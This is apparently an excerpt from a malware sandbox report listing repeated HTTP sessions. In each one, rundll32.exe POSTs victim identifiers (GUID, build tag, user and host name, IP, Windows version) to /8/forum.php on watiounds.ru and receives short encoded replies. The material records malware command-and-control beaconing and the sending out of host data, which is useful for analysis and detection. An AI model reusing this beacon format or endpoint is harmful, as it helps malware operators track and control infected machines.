                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          267192.168.2.224943295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:25.324019909 CEST334OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:25.447189093 CEST334INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cATGZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          268192.168.2.224943395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:25.759485006 CEST335OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:25.883337021 CEST335INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          269192.168.2.224943495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:26.198023081 CEST336OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:26.321511984 CEST336INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJHSQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          27192.168.2.224919295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:35.561132908 CEST65OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:35.684824944 CEST66INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          270192.168.2.224943595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:26.635050058 CEST337OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:26.757733107 CEST338INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCNMXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          271192.168.2.224943695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.072484970 CEST338OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:27.194560051 CEST339INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          272192.168.2.224943795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.512469053 CEST339OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:27.636106014 CEST340INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          273192.168.2.224943895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.954387903 CEST341OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.077712059 CEST341INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          274192.168.2.224943995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:28.394934893 CEST342OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.518426895 CEST342INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHZASARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          275192.168.2.224944095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:28.832129002 CEST343OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.958154917 CEST343INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          276192.168.2.224944195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:29.273956060 CEST344OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:29.405656099 CEST344INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 41 5a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBAZYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          277192.168.2.224944295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:29.727796078 CEST345OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:29.857126951 CEST345INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVAZEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          278192.168.2.224944395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:30.177864075 CEST346OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:30.302311897 CEST346INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          279192.168.2.224944495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:30.627310991 CEST347OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:30.750931978 CEST348INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJZAQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.224919395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:36.003711939 CEST66OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:36.126219988 CEST67INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          280192.168.2.224944595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.065802097 CEST348OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:31.193687916 CEST349INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          281192.168.2.224944695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.514377117 CEST349OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:31.637969017 CEST350INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAMNZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          282192.168.2.224944795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.957591057 CEST351OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
